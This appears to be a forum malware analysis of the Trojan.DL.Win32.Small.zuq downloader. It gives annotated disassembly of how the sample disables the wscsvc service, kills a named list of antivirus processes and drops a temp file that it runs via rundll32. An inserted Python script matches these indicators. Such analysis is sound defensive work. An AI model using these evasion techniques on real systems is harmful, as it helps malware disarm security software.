Topic: A brief analysis of Trojan.DL.Win32.Small.zuq
Posted by z3960 on 2023-05-18 07:24
File: gr.exe
Size: 29184 bytes
SHA1: 12C60FEFAE4865F8BFB8E9D169FA82A117F9BD1A
Packer: UPX
Language: Borland Delphi
Rising scan result: Trojan.DL.Win32.Small.zuq

Brief behaviour analysis

1. Create a mutex named "abcf":
004039E0  68 2C344000     push 0040342C            ; ASCII "abcf"
004039E5  6A 01           push 1
004039E7  53              push ebx
004039E8  FF15 64104000   call dword ptr [         ; create a mutex named "abcf"
004039EE  FF15 60104000   call dword ptr [         ; ntdll.RtlGetLastWin32Error

2. Disable the "wscsvc" service:
004043F7  55              push ebp
004043F8  8BEC            mov ebp, esp
004043FA  83EC 1C         sub esp, 1C
004043FD  68 3F000F00     push 0F003F
00404402  6A 00           push 0
00404404  FF75 08         push dword ptr
00404407  FF15 34104000   call dword ptr [         ; open the service control manager
0040440D  85C0            test eax, eax
0040440F  8945 08         mov dword ptr , eax
00404412  74 47           je short 0040445B
00404414  56              push esi
00404415  57              push edi
00404416  68 FF010F00     push 0F01FF
0040441B  FF75 0C         push dword ptr
0040441E  50              push eax
0040441F  FF15 04104000   call dword ptr [         ; open the wscsvc service
00404425  8B3D 08104000   mov edi, dword ptr [     ; ADVAPI32.CloseServiceHandle
0040442B  8BF0            mov esi, eax
0040442D  85F6            test esi, esi
0040442F  74 23           je short 00404454
00404431  807D 10 00      cmp byte ptr , 0
00404435  74 0D           je short 00404444
00404437  6A 00           push 0
00404439  6A 00           push 0
0040443B  56              push esi
0040443C  FF15 24104000   call dword ptr [         ; ADVAPI32.StartServiceA
00404442  EB 0D           jmp short 00404451
00404444  8D45 E4         lea eax, dword ptr
00404447  50              push eax
00404448  6A 01           push 1
0040444A  56              push esi
0040444B  FF15 30104000   call dword ptr [         ; stop and disable the wscsvc service through ControlService

3. Take a snapshot of the system's processes, dynamically restore the process-name string into memory and append ".exe" to it, then compare to check whether any of the processes "rstray.exe, rsnetsvr.exe, ccenter.exe, scanfrm.exe, ravmond.exe, ravtask.exe, rsmain.exe, rfwsrv.exe, ras.exe, kavstart.exe, kissvc.exe, kamilmon.exe, kpfw32.exe, kpfwsvc.exe, kwatch.exe, kaccore.exe" is running; if one is, terminate it by freeing its memory.
00403DD0  6A 00           push 0
00403DD2  6A 02           push 2
00403DD4  E8 A5060000     call                     ; create a system snapshot
00403DD9  8BF0            mov esi, eax
00403DDB  6A 01           push 1
00403DDD  897424 0C       mov dword ptr , esi
00403DE1  FF15 A8104000   call dword ptr []        ; kernel32.Sleep
00403DE7  83FE FF         cmp esi, -1
00403DEA  75 07           jnz short 00403DF3
00403DEC  33C0            xor eax, eax
00403DEE  E9 77010000     jmp 00403F6A
00403DF3  53              push ebx
00403DF4  55              push ebp
00403DF5  8D4424 14       lea eax, dword ptr
00403DF9  57              push edi
00403DFA  50              push eax
00403DFB  56              push esi
00403DFC  C74424 20 28010> mov dword ptr , 128
00403E04  E8 6F060000     call                     ; get the first process in the snapshot
00403E09  BB B0454000     mov ebx, 004045B0
00403E0E  85C0            test eax, eax
00403E10  0F84 DD000000   je 00403EF3
00403E16  33ED            xor ebp, ebp
00403E18  8B3CAD 08334000 mov edi, dword ptr
00403E1F  83C9 FF         or ecx, FFFFFFFF
00403E22  33C0            xor eax, eax
00403E24  53              push ebx
00403E25  F2:AE           repne scas byte ptr es:
00403E27  F7D1            not ecx
00403E29  2BF9            sub edi, ecx
00403E2B  8BC1            mov eax, ecx
00403E2D  8BF7            mov esi, edi
00403E2F  8BFB            mov edi, ebx
00403E31  C1E9 02         shr ecx, 2
00403E34  F3:A5           rep movs dword ptr es:, dword p>
00403E36  8BC8            mov ecx, eax
00403E38  83E1 03         and ecx, 3
00403E3B  F3:A4           rep movs byte ptr es:, byte ptr>
00403E3D  E8 35FEFFFF     call 00403C77            ; restore the string into memory
00403E42  59              pop ecx
00403E43  BF AC344000     mov edi, 004034AC        ; ASCII ".exe"
00403E48  83C9 FF         or ecx, FFFFFFFF
00403E4B  33C0            xor eax, eax
00403E4D  F2:AE           repne scas byte ptr es:
00403E4F  F7D1            not ecx
00403E51  2BF9            sub edi, ecx
00403E53  8BF7            mov esi, edi
00403E55  8BD1            mov edx, ecx
00403E57  8BFB            mov edi, ebx
00403E59  83C9 FF         or ecx, FFFFFFFF
00403E5C  F2:AE           repne scas byte ptr es:
00403E5E  8BCA            mov ecx, edx
00403E60  4F              dec edi
00403E61  C1E9 02         shr ecx, 2
00403E64  F3:A5           rep movs dword ptr es:, dword p>
00403E66  8BCA            mov ecx, edx
00403E68  83E1 03         and ecx, 3
00403E6B  85ED            test ebp, ebp
00403E6D  F3:A4           rep movs byte ptr es:, byte ptr>
00403E6F  75 3A           jnz short 00403EAB
00403E71  8BFB            mov edi, ebx
00403E73  83C9 FF         or ecx, FFFFFFFF
00403E76  F2:AE           repne scas byte ptr es:
00403E78  F7D1            not ecx
00403E7A  2BF9            sub edi, ecx
00403E7C  B8 98444000     mov eax, 00404498
00403E81  8BD1            mov edx, ecx
00403E83  8BF7            mov esi, edi
00403E85  8BF8            mov edi, eax
00403E87  50              push eax
00403E88  C1E9 02         shr ecx, 2
00403E8B  F3:A5           rep movs dword ptr es:, dword p>
00403E8D  8BCA            mov ecx, edx
00403E8F  8D4424 40       lea eax, dword ptr
00403E93  83E1 03         and ecx, 3
00403E96  50              push eax
00403E97  F3:A4           rep movs byte ptr es:, byte ptr>
00403E99  FF15 88104000   call dword ptr []        ; compare
00403E9F  85C0            test eax, eax
00403EA1  75 08           jnz short 00403EAB       ; jump to 00403EAB if different
00403EA3  C74424 10 01000> mov dword ptr , 1
00403EAB  8BFB            mov edi, ebx
00403EAD  83C9 FF         or ecx, FFFFFFFF
00403EB0  33C0            xor eax, eax
00403EB2  F2:AE           repne scas byte ptr es:
00403EB4  F7D1            not ecx
00403EB6  49              dec ecx
00403EB7  83F9 06         cmp ecx, 6
00403EBA  76 1A           jbe short 00403ED6
00403EBC  8D4424 3C       lea eax, dword ptr
00403EC0  53              push ebx
00403EC1  50              push eax
00403EC2  FF15 88104000   call dword ptr []        ; compare
00403EC8  85C0            test eax, eax
00403ECA  75 0A           jnz short 00403ED6       ; jump to 00403ED6 if different
00403ECC  FF7424 20       push dword ptr
00403ED0  E8 86FEFFFF     call 00403D5B            ; if one of the above processes exists, execution falls through to here and the process is killed by freeing its memory with VirtualFreeEx
00403ED5  59              pop ecx
00403ED6  45              inc ebp
00403ED7  83FD 12         cmp ebp, 12
00403EDA  ^ 0F8E 38FFFFFF jle 00403E18
00403EE0  8D4424 18       lea eax, dword ptr
00403EE4  50              push eax
00403EE5  FF7424 18       push dword ptr
00403EE9  E8 84050000     call                     ; get the next process in the snapshot
00403EEE  ^ E9 1BFFFFFF   jmp 00403E0E             ; jump to 00403E0E for the next comparison

4. Create a thread and suspend the main thread:
00403F8F  FF15 98104000   call dword ptr [401098]  ; create the thread
00403F95  8BF0            mov esi, eax
00403F97  6A FF           push -1
00403F99  56              push esi
00403F9A  FF15 94104000   call dword ptr [401094]  ; wait for the thread to exit

The thread obtains the temporary folder path, calls GetTickCount to get the system uptime and appends ".t" to it to form a random file name ~1476b8.t, creates that file in the temporary folder, decrypts a string to obtain the command line "%temp%\~1476b8.t,AboutDlgProc 18", decrypts further strings to obtain the process names avp.exe, safeboxtray.exe and 360tray.exe, checks whether any of those processes is running, and if so creates a rundll32.exe process to execute the command line.
0040422B  FF15 58104000   call dword ptr [         ; get the temporary folder path
00404231  FF15 54104000   call dword ptr [         ; get the system tick count (uptime)
00404237  83C0 03         add eax, 3
0040423A  50              push eax
0040423B  8D85 58FCFFFF   lea eax, dword ptr
00404241  50              push eax
00404242  8D85 5CFDFFFF   lea eax, dword ptr
00404248  68 34354000     push 00403534            ; %s~%x.t
0040424D  50              push eax
0040424E  FF15 FC104000   call dword ptr []        ; USER32.wsprintfA
00404254  8D85 5CFDFFFF   lea eax, dword ptr
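As an added defender-side example (not code from the post), the indicators the analysis lists folded into a small Python triage routine: the "abcf" mutex, the wscsvc service state, both process-name lists, and patterns for the ~<hex>.t temp file and the rundll32 command line. The host observations in the `__main__` block are constructed, and `triage` and `dropped_file_name` are names chosen here.

```python
import re

# Indicators from the analysis above; the sample observations below are constructed.
MUTEX_NAME = "abcf"
TARGET_SERVICE = "wscsvc"  # Security Center service the sample stops
KILLED_PROCESSES = {
    "rstray.exe", "rsnetsvr.exe", "ccenter.exe", "scanfrm.exe", "ravmond.exe",
    "ravtask.exe", "rsmain.exe", "rfwsrv.exe", "ras.exe", "kavstart.exe",
    "kissvc.exe", "kamilmon.exe", "kpfw32.exe", "kpfwsvc.exe", "kwatch.exe",
    "kaccore.exe"}
TRIGGER_PROCESSES = {"avp.exe", "safeboxtray.exe", "360tray.exe"}
# Dropped file: wsprintfA("%s~%x.t", temp_dir, GetTickCount() + 3), e.g. ~1476b8.t,
# then executed as "rundll32 <temp>\~xxxx.t,AboutDlgProc 18".
DROPPED_FILE_RE = re.compile(r"~[0-9a-f]{1,8}\.t$", re.IGNORECASE)
RUNDLL_CMD_RE = re.compile(
    r"rundll32(?:\.exe)?\s+\S+~[0-9a-f]{1,8}\.t,AboutDlgProc\s+18\b", re.IGNORECASE)


def dropped_file_name(temp_dir, tick_count):
    """Reproduce the name format the post describes, for building file watchlists."""
    return "%s~%x.t" % (temp_dir, (tick_count + 3) & 0xFFFFFFFF)


def triage(mutexes, services, processes, command_lines, temp_files):
    """Match host observations against the indicators; returns sorted (type, detail)."""
    findings = set()
    if MUTEX_NAME in mutexes:
        findings.add(("mutex", MUTEX_NAME))
    state = services.get(TARGET_SERVICE)
    if state and state.lower() != "running":
        findings.add(("service", "%s is %s" % (TARGET_SERVICE, state)))
    for name in {p.lower() for p in processes} & (KILLED_PROCESSES | TRIGGER_PROCESSES):
        findings.add(("av_present", name))  # shows which branch the sample would take
    for cmd in command_lines:
        if RUNDLL_CMD_RE.search(cmd):
            findings.add(("rundll32_cmdline", cmd))
    for path in temp_files:
        if DROPPED_FILE_RE.search(path):
            findings.add(("dropped_file", path))
    return sorted(findings)


if __name__ == "__main__":
    obs = {  # constructed observations, not real telemetry
        "mutexes": {"abcf"}, "services": {"wscsvc": "Stopped"},
        "processes": ["explorer.exe", "360tray.exe"],
        "command_lines": [r"rundll32.exe C:\Temp\~1476b8.t,AboutDlgProc 18"],
        "temp_files": [r"C:\Temp\~1476b8.t"]}
    for kind, detail in triage(**obs):
        print(kind, detail)
```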
Next page (1/13)
Replies (3):
3 # 任逍遥
05-19 06:19
Nice, got it.
2 # 任逍遥
05-19 06:19
Taking a look.
1 # 爱我中华
05-18 15:13
Learned something.